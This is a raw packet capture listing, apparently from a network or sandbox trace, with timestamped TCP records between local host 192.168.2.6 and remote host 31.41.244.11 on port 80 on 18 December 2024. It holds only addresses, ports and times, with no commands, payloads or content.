                                                                                                                                                              Dec 18, 2024 11:47:15.595135927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.595185995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.595233917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.596407890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.596451044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.596509933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.596553087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.597631931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.597681046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.597806931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.597845078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.598614931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.598660946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.598752975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.598802090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.599766016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.599809885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.599849939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.599884987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.600961924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.600974083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.601003885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.601016045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.602171898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.602221966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.602258921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.602299929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.603285074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.603358984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.603396893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.603441000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.604475975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.604523897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.604530096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.604573011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.605691910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.605742931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.605859995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.605901957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.606796026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.606833935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.606868982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.606913090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.608067989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.608120918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.608180046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.608223915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.609164953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.609177113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.609204054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.609217882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.610539913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.610582113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.610605955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.610649109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.611689091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.611737013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.611850023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.611954927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.612848043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.612869978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.612890959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.612903118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.613817930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.613861084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.613953114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.613991976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.615012884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.615058899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.615062952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.615104914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.616156101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.616209030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.616290092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.616333008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.617312908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.617358923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.617366076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.617408037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.618520975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.618567944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.618622065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.618669033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.619667053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.619716883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.619719028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.619764090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.620893002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.620984077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.620986938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.621022940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.622018099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.622061968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.622153044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.622195005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.623163939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.623212099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.623275995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.623331070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.624377966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.624452114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.624460936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.624507904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.625538111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.625580072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.625642061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.625696898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.626704931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.626780987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.626811981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.626822948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.627842903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.627888918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.627953053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.628040075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.757692099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.757715940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.757810116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.757989883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.758033037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.758080006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.758120060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.759175062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.759224892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.759275913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.759320974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.760481119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.760529041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.760613918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.760658979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.762094021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.762155056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.762187958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.762234926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.762774944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.762840033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.762871027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.762916088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.763971090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.764018059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.764185905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.764225960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.765276909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.765290976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.765324116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.765369892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.766199112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.766253948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.766305923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.766352892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.767678976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.767693043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.767730951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.768619061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.768632889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.768672943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.769807100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.769853115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.769885063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.769927979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.770919085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.770975113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.771043062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.771089077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.772085905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.772097111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.772142887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.773325920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.773375988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.773567915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.773607016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.774416924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.774466038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.774493933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.774528027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.775644064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.775656939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.775690079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.775708914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.776736975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.776779890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.776865959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.776906967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.777892113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.777905941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.777935028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.777945995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.779114962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.779130936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.779165030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.779175997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.780257940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.780316114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.780353069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.780392885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.781483889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.781537056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.781542063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.781570911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.782645941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.782700062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.782706976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.782769918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.783782959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.783834934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.783881903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.783920050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.785032034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.785074949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.785135984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.785180092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.786127090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.786149979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.786175966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.786201954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.787271023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.787354946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.787386894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.787446022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.788470030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.788516045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.788594961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.788630009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.789622068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.789663076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.789695978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.789730072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.790803909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.790847063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.790858030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.790889978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.791954994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.792001009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.792041063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.792083025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.793142080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.793203115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.793669939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.793718100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.794300079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.794337988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.794652939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.794693947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.795633078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.795675039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.795727968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.795773029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.796852112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.796895981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.796897888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.796937943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.797847033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.797899008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.797902107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.797934055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.798985004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.799031019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.799288034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.799331903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.800147057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.800193071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.800261021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.800299883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.801357985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.801398993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.801409006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.801455975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.802463055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.802509069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.803144932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.803189039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.803684950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.803738117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.804233074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.804277897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.805052996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.805095911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.805175066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.805217028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.806046963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.806102991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.806653976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.806701899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.807193041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.807240963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.807374001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.807414055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.808324099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.808370113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.808521986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.808572054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.809561014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.809612989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.809633017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.809675932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.810694933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.810744047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.810810089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.810853004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.811916113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.811966896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.812027931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.812072039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.813066959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.813116074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.813225985 CET804980631.41.244.11192.168.2.6
